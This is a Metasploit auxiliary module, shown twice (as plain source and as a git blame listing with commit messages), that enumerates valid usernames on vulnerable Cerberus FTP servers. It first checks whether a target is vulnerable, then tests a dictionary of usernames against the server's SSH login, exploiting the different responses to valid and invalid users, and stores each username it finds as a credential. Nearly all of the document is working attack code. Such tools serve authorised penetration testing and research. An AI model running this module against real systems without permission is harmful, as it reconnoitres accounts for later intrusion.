metasploit-framework/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cerberus FTP Server SFTP Username Enumeration',
      'Description' => %q{
        This module uses a dictionary to brute force valid usernames from
        Cerberus FTP server via SFTP.  This issue affects all versions of
        the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy
        in the way the SSH service handles failed logins for valid and invalid
        users.  This issue was discovered by Steve Embling.
      },
      'Author'      => [
        'Steve Embling', # Discovery
        'Matt Byrne <attackdebris[at]gmail.com>' # Metasploit module
      ],
      'References'     =>
        [
          [ 'URL',  'http://xforce.iss.net/xforce/xfdb/93546' ],
          [ 'BID', '67707']
        ],
      'License'     => MSF_LICENSE,
      'DisclosureDate' => 'May 27 2014'
    ))

    register_options(
      [
        Opt::Proxies,
        Opt::RPORT(22),
        OptPath.new(
          'USER_FILE',
          [true, 'Files containing usernames, one per line', nil])
      ], self.class
    )

    register_advanced_options(
      [
        OptInt.new(
          'RETRY_NUM',
          [true , 'The number of attempts to connect to a SSH server for each user', 3]),
        OptInt.new(
          'SSH_TIMEOUT',
          [true, 'Specify the maximum time to negotiate a SSH session', 10]),
        OptBool.new(
          'SSH_DEBUG',
          [true, 'Enable SSH debugging output (Extreme verbosity!)', false])
      ]
    )
  end

  def rport
    datastore['RPORT']
  end

  def retry_num
    datastore['RETRY_NUM']
  end

  def check_vulnerable(ip)
    options = {
      :port => rport,
      :auth_methods  => ['password', 'keyboard-interactive'],
      :msframework   => framework,
      :msfmodule     => self,
      :disable_agent => true,
      :config        => false,
      :proxies       => datastore['Proxies']
    }

    begin
      transport = Net::SSH::Transport::Session.new(ip, options)
    rescue Rex::ConnectionError
      return :connection_error
    end

    auth = Net::SSH::Authentication::Session.new(transport, options)
    auth.authenticate("ssh-connection", Rex::Text.rand_text_alphanumeric(8), Rex::Text.rand_text_alphanumeric(8))
    auth_method = auth.allowed_auth_methods.join('|')
    print_status "#{peer(ip)} Server Version: #{auth.transport.server_version.version}"
    report_service(
      :host => ip,
      :port => rport,
      :name => "ssh",
      :proto => "tcp",
      :info => auth.transport.server_version.version
    )

    if auth_method.empty?
      :vulnerable
    else
      :safe
    end
  end

  def check_user(ip, user, port)
    pass = Rex::Text.rand_text_alphanumeric(8)

    opt_hash = {
      :auth_methods  => ['password', 'keyboard-interactive'],
      :msframework   => framework,
      :msfmodule     => self,
      :port          => port,
      :disable_agent => true,
      :config        => false,
      :proxies       => datastore['Proxies']
    }

    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
    transport = Net::SSH::Transport::Session.new(ip, opt_hash)
    auth = Net::SSH::Authentication::Session.new(transport, opt_hash)

    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        auth.authenticate("ssh-connection", user, pass)
        auth_method = auth.allowed_auth_methods.join('|')
        if auth_method != ''
          :success
        else
          :fail
        end
      end
    rescue Rex::ConnectionError
      return :connection_error
    rescue Net::SSH::Disconnect, ::EOFError
      return :success
    rescue ::Timeout::Error
      return :connection_error
    end
  end

  def do_report(ip, user, port)
    service_data = {
      address: ip,
      port: rport,
      service_name: 'ssh',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: user,
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def peer(rhost=nil)
    "#{rhost}:#{rport} SSH -"
  end

  def user_list
    users = nil
    if File.readable? datastore['USER_FILE']
      users = File.new(datastore['USER_FILE']).read.split
      users.each {|u| u.downcase!}
      users.uniq!
    else
      raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
    end

    users
  end

  def attempt_user(user, ip)
    attempt_num = 0
    ret = nil

    while (attempt_num <= retry_num) && (ret.nil? || ret == :connection_error)
      if attempt_num > 0
        Rex.sleep(2 ** attempt_num)
        vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")
      end

      ret = check_user(ip, user, rport)
      attempt_num += 1
    end

    ret
  end

  def show_result(attempt_result, user, ip)
    case attempt_result
    when :success
      print_good "#{peer(ip)} User '#{user}' found"
      do_report(ip, user, rport)
    when :connection_error
      print_error "#{peer(ip)} User '#{user}' could not connect"
    when :fail
      vprint_status "#{peer(ip)} User '#{user}' not found"
    end
  end

  def run_host(ip)
    print_status "#{peer(ip)} Checking for vulnerability"
    case check_vulnerable(ip)
    when :vulnerable
      print_good "#{peer(ip)} Vulnerable"
      print_status "#{peer(ip)} Starting scan"
      user_list.each do |user|
        show_result(attempt_user(user, ip), user, ip)
      end
    when :safe
      print_error "#{peer(ip)} Not vulnerable"
    when :connection_error
      print_error "#{peer(ip)} Connection failed"
    end
  end
end
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'net/ssh'`

Revert "change Metasploit3 class names" This reverts commit 666ae14259085ff71cf1b5966d65c84cd0996c5d. 2016-03-07 19:19:55 +00:00			`class Metasploit3 < Msf::Auxiliary`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00
			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Cerberus FTP Server SFTP Username Enumeration',`
			`'Description' => %q{`
			`This module uses a dictionary to brute force valid usernames from`
			`Cerberus FTP server via SFTP. This issue affects all versions of`
			`the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy`
			`in the way the SSH service handles failed logins for valid and invalid`
			`users. This issue was discovered by Steve Embling.`
			`},`
Small tidyup 2014-06-30 17:17:49 +00:00			`'Author' => [`
			`'Steve Embling', # Discovery`
Fix email format 2014-07-11 17:45:23 +00:00			`'Matt Byrne <attackdebris[at]gmail.com>' # Metasploit module`
Small tidyup 2014-06-30 17:17:49 +00:00			`],`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`'References' =>`
			`[`
Small tidyup 2014-06-30 17:17:49 +00:00			`[ 'URL', 'http://xforce.iss.net/xforce/xfdb/93546' ],`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`[ 'BID', '67707']`
			`],`
			`'License' => MSF_LICENSE,`
			`'DisclosureDate' => 'May 27 2014'`
			`))`

			`register_options(`
			`[`
These mods support Proxies, so make the option visible for the user 2014-10-21 20:39:24 +00:00			`Opt::Proxies,`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`Opt::RPORT(22),`
Small tidyup 2014-06-30 17:17:49 +00:00			`OptPath.new(`
			`'USER_FILE',`
			`[true, 'Files containing usernames, one per line', nil])`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`], self.class`
			`)`

			`register_advanced_options(`
			`[`
Small tidyup 2014-06-30 17:17:49 +00:00			`OptInt.new(`
			`'RETRY_NUM',`
			`[true , 'The number of attempts to connect to a SSH server for each user', 3]),`
			`OptInt.new(`
			`'SSH_TIMEOUT',`
			`[true, 'Specify the maximum time to negotiate a SSH session', 10]),`
			`OptBool.new(`
			`'SSH_DEBUG',`
			`[true, 'Enable SSH debugging output (Extreme verbosity!)', false])`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`]`
			`)`
			`end`

			`def rport`
			`datastore['RPORT']`
			`end`

			`def retry_num`
			`datastore['RETRY_NUM']`
			`end`

			`def check_vulnerable(ip)`
			`options = {`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`:port => rport,`
			`:auth_methods => ['password', 'keyboard-interactive'],`
			`:msframework => framework,`
			`:msfmodule => self,`
			`:disable_agent => true,`
			`:config => false,`
			`:proxies => datastore['Proxies']`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`}`

More verbose around connection errors 2014-06-30 17:56:30 +00:00			`begin`
			`transport = Net::SSH::Transport::Session.new(ip, options)`
Differentiate failed binds from connects, closes #4169 This change adds two new Rex exceptions and changes the local comm to raise the right one depending on the circumstances. The problem with the existing model is that failed binds and failed connections both raised the same exception. This change is backwards compatible with modules that rescue Rex::AddressInUse in additi on to Rex::ConnectionError. There were two corner cases that rescued Rex::AddressInUse specifically: 1. The 'r'-services mixin and modules caught the old exception when handling bind errors. These have been updated to use BindFailed 2. The meterpreter client had a catch for the old exception when the socket reports a bad destination (usually a network connection dropped). This has been updat ed to use InvalidDestination as that was the intention prior to this change. Since AddressInUse was part of ConnectionError, modules and mixins which caught both in the same rescue have been updated to just catch ConnectionError. 2014-11-11 20:59:41 +00:00			`rescue Rex::ConnectionError`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`return :connection_error`
			`end`

			`auth = Net::SSH::Authentication::Session.new(transport, options)`
			`auth.authenticate("ssh-connection", Rex::Text.rand_text_alphanumeric(8), Rex::Text.rand_text_alphanumeric(8))`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`auth_method = auth.allowed_auth_methods.join('\|')`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`print_status "#{peer(ip)} Server Version: #{auth.transport.server_version.version}"`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`report_service(`
			`:host => ip,`
			`:port => rport,`
			`:name => "ssh",`
			`:proto => "tcp",`
			`:info => auth.transport.server_version.version`
			`)`

More verbose around connection errors 2014-06-30 17:56:30 +00:00			`if auth_method.empty?`
			`:vulnerable`
			`else`
			`:safe`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`end`
			`end`

			`def check_user(ip, user, port)`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`pass = Rex::Text.rand_text_alphanumeric(8)`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00
			`opt_hash = {`
			`:auth_methods => ['password', 'keyboard-interactive'],`
			`:msframework => framework,`
			`:msfmodule => self,`
			`:port => port,`
			`:disable_agent => true,`
			`:config => false,`
			`:proxies => datastore['Proxies']`
			`}`

			`opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']`
			`transport = Net::SSH::Transport::Session.new(ip, opt_hash)`
			`auth = Net::SSH::Authentication::Session.new(transport, opt_hash)`

			`begin`
			`::Timeout.timeout(datastore['SSH_TIMEOUT']) do`
Small tidyup 2014-06-30 17:17:49 +00:00			`auth.authenticate("ssh-connection", user, pass)`
			`auth_method = auth.allowed_auth_methods.join('\|')`
			`if auth_method != ''`
			`:success`
			`else`
			`:fail`
			`end`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`end`
Differentiate failed binds from connects, closes #4169 This change adds two new Rex exceptions and changes the local comm to raise the right one depending on the circumstances. The problem with the existing model is that failed binds and failed connections both raised the same exception. This change is backwards compatible with modules that rescue Rex::AddressInUse in additi on to Rex::ConnectionError. There were two corner cases that rescued Rex::AddressInUse specifically: 1. The 'r'-services mixin and modules caught the old exception when handling bind errors. These have been updated to use BindFailed 2. The meterpreter client had a catch for the old exception when the socket reports a bad destination (usually a network connection dropped). This has been updat ed to use InvalidDestination as that was the intention prior to this change. Since AddressInUse was part of ConnectionError, modules and mixins which caught both in the same rescue have been updated to just catch ConnectionError. 2014-11-11 20:59:41 +00:00			`rescue Rex::ConnectionError`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`return :connection_error`
			`rescue Net::SSH::Disconnect, ::EOFError`
			`return :success`
			`rescue ::Timeout::Error`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`return :connection_error`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`end`
Small tidyup 2014-06-30 17:17:49 +00:00			`end`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00
			`def do_report(ip, user, port)`
Another update 2015-07-29 19:31:35 +00:00			`service_data = {`
			`address: ip,`
			`port: rport,`
			`service_name: 'ssh',`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: user,`
			`}.merge(service_data)`

			`login_data = {`
			`core: create_credential(credential_data),`
			`status: Metasploit::Model::Login::Status::UNTRIED,`
			`}.merge(service_data)`

			`create_credential_login(login_data)`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`end`

			`def peer(rhost=nil)`
			`"#{rhost}:#{rport} SSH -"`
			`end`

			`def user_list`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`users = nil`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`if File.readable? datastore['USER_FILE']`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`users = File.new(datastore['USER_FILE']).read.split`
			`users.each {\|u\| u.downcase!}`
			`users.uniq!`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`else`
			`raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"`
			`end`
More verbose around connection errors 2014-06-30 17:56:30 +00:00
			`users`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`end`

			`def attempt_user(user, ip)`
			`attempt_num = 0`
			`ret = nil`

Small tidyup 2014-06-30 17:17:49 +00:00			`while (attempt_num <= retry_num) && (ret.nil? \|\| ret == :connection_error)`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`if attempt_num > 0`
			`Rex.sleep(2 ** attempt_num)`
Delete print_debug/vprint_debug 2015-04-21 16:14:03 +00:00			`vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`end`

			`ret = check_user(ip, user, rport)`
			`attempt_num += 1`
			`end`

			`ret`
			`end`

			`def show_result(attempt_result, user, ip)`
			`case attempt_result`
			`when :success`
			`print_good "#{peer(ip)} User '#{user}' found"`
			`do_report(ip, user, rport)`
			`when :connection_error`
Small tidyup 2014-06-30 17:17:49 +00:00			`print_error "#{peer(ip)} User '#{user}' could not connect"`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`when :fail`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`vprint_status "#{peer(ip)} User '#{user}' not found"`
Small tidyup 2014-06-30 17:17:49 +00:00			`end`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`end`

			`def run_host(ip)`
			`print_status "#{peer(ip)} Checking for vulnerability"`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`case check_vulnerable(ip)`
			`when :vulnerable`
			`print_good "#{peer(ip)} Vulnerable"`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`print_status "#{peer(ip)} Starting scan"`
Small tidyup 2014-06-30 17:17:49 +00:00			`user_list.each do \|user\|`
			`show_result(attempt_user(user, ip), user, ip)`
			`end`
More verbose around connection errors 2014-06-30 17:56:30 +00:00			`when :safe`
			`print_error "#{peer(ip)} Not vulnerable"`
			`when :connection_error`
			`print_error "#{peer(ip)} Connection failed"`
Clean commit of Cerberus FTP User Enumeration Module 2014-06-30 16:53:46 +00:00			`end`
			`end`
			`end`
Small tidyup 2014-06-30 17:17:49 +00:00